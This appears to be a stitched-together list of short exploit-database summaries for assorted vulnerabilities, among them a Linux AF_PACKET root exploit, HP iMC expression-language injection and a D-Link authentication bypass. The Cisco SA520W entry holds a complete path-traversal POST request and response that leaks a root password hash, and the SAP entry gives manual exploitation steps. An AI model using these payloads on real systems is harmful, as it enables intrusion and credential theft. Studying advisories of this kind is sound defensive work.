Easy MPEG to DVD Burner 1.7.11 is vulnerable to a local buffer overflow vulnerability. This vulnerability can be exploited by malicious users to execute arbitrary code on the affected system. The vulnerability is due to a boundary error when handling user-supplied input passed to the application. A specially crafted input can cause a stack-based buffer overflow, which can be exploited to execute arbitrary code on the system with the privileges of the user running the application. The vulnerability is triggered when a malicious user supplies a specially crafted input to the application. This can be exploited to execute arbitrary code on the system with the privileges of the user running the application.
The web panel of D-Link DSL 3782 version (A1_WI_20170303) does not release a token ID (e.g. a session cookie) that identifies the logged in administrator, but only relies on a server-side timeout that lasts few minutes. In addition, a server-side mitigation in place prompts for login credentials everytime the webroot is loaded, but does leave the application endpoints unprotected and affected by this authentication bypass. Therefore, after a valid login of the administrator the web panel does not distinguish valid HTTP requests from the admin and the ones that come from other users. This way, an attacker can script an automatic routine that perform unwanted actions such as arbitrary modifications to router and SSIDs passwords and configurations.
A possible attacker can take advantage of this vulnerability to obtain confidential information of the platform, as well as the possibility of writing in the logs of the registry in order to get remote execution of commands and take control of the system.
This module exploits a heap-out-of-bounds write in the packet_set_ring function in net/packet/af_packet.c (AF_PACKET) in the Linux kernel to execute code as root (CVE-2017-7308). The bug was initially introduced in 2011 and patched in version 4.10.6, potentially affecting a large number of kernels; however this exploit targets only systems using Ubuntu Xenial kernels 4.8.0 < 4.8.0-46, including Linux distros based on Ubuntu Xenial, such as Linux Mint. The target system must have unprivileged user namespaces enabled and two or more CPU cores. Bypasses for SMEP, SMAP and KASLR are included. Failed exploitation may crash the kernel. This module has been tested successfully on Linux Mint 18 (x86_64) with kernel versions: 4.8.0-34-generic; 4.8.0-36-generic; 4.8.0-39-generic; 4.8.0-41-generic; 4.8.0-42-generic; 4.8.0-44-generic; 4.8.0-45-generic.
Chakra uses the InvariantBlockBackwardIterator class to backpropagate the information about the hoisted bound checks. But the class follows the linked list instead of the control flow. This may lead to incorrectly remove the bound checks, resulting in an Out-of-Bounds Read vulnerability.
DynoRoot is a DHCP client command injection vulnerability that affects RHEL 6.x / 7.x and CentOS 6.x/7.x. It allows an attacker to inject arbitrary commands into a vulnerable DHCP client by sending a malicious DHCP response. The vulnerability was discovered by Felix Wilhelm and an exploit was developed by Kevin Kirsche.
CSRF vulnerability allows attacker to change user's information directly. The POC provided shows an example of how an attacker can craft a malicious HTML form to change a user's information.
Cisco SA 500 Series Security Appliances are designed for businesses with fewer than 100 employees. In this vulnerability, an attacker can exploit a path traversal vulnerability in the Cisco SA520W Security Appliance to read the /etc/passwd file. The vulnerable parameter is 'thispage' and the payload is '..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd%00index.htm'. The request type is POST and the request is 'POST /scgi-bin/platform.cgi HTTP/1.1 Host: host-ip User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:58.0) Gecko/20100101 Firefox/58.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Referer: https://70.186.255.169/scgi-bin/platform.cgi Content-Type: application/x-www-form-urlencoded Content-Length: 311 Connection: close Upgrade-Insecure-Requests: 1 thispage=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd%00index.htm&SSLVPNUser.UserName=admin&SSLVPNUser.Password=admin&button.login.routerStatus=Log+In&Login.userAgent=Mozilla%2F5.0+%28Windows+NT+10.0%3B+Win64%3B+x64%3B+rv%3A58.0%29+Gecko%2F20100101+Firefox%2F58.0' and the response is 'HTTP/1.0 200 OK Date: Sat, 01 Jan 2000 00:00:41 GMT Server: Embedded HTTP Server. Connection: close root:$1$omdZQoH8$bFOOjhl.E7BKKzvW/bRJe0:0:0:root:/:/bin/sh nobody:x:0:0:nobody:/nonexistent:/bin/false'
This module exploits an expression language injection vulnerability, along with an authentication bypass vulnerability in Hewlett Packard Enterprise Intelligent Management Center before version 7.3 E0504P04 to achieve remote code execution. The HP iMC server suffers from multiple vulnerabilities allows unauthenticated attacker to execute arbitrary Expression Language via the beanName parameter, allowing execution of arbitrary operating system commands as SYSTEM. This service listens on TCP port 8080 and 8443 by default.
Anonymous attacker can use a special HTTP request to get information about SAP NetWeaver users. A potential attacker can use the vulnerability in order to reveal information about user names, first and last names, and associated emails, this can provide an attacker with enough information to make a more accurate and effective attack. Steps to exploit this vulnerability: 1. Open http://SAP/webdynpro/dispatcher/sap.com/caf~eu~gp~example~timeoff~wd/ACreate or http://SAP/webdynpro/dispatcher/sap.com/caf~eu~gp~example~timeoff~wd/com.sap.caf.eu.gp.example.timeoff.wd.create.ACreate page on SAP server. 2. Press 'Change processor' button. 3. and in the 'find' section, put the initial or name to be searched, followed by a *.
Services By CQR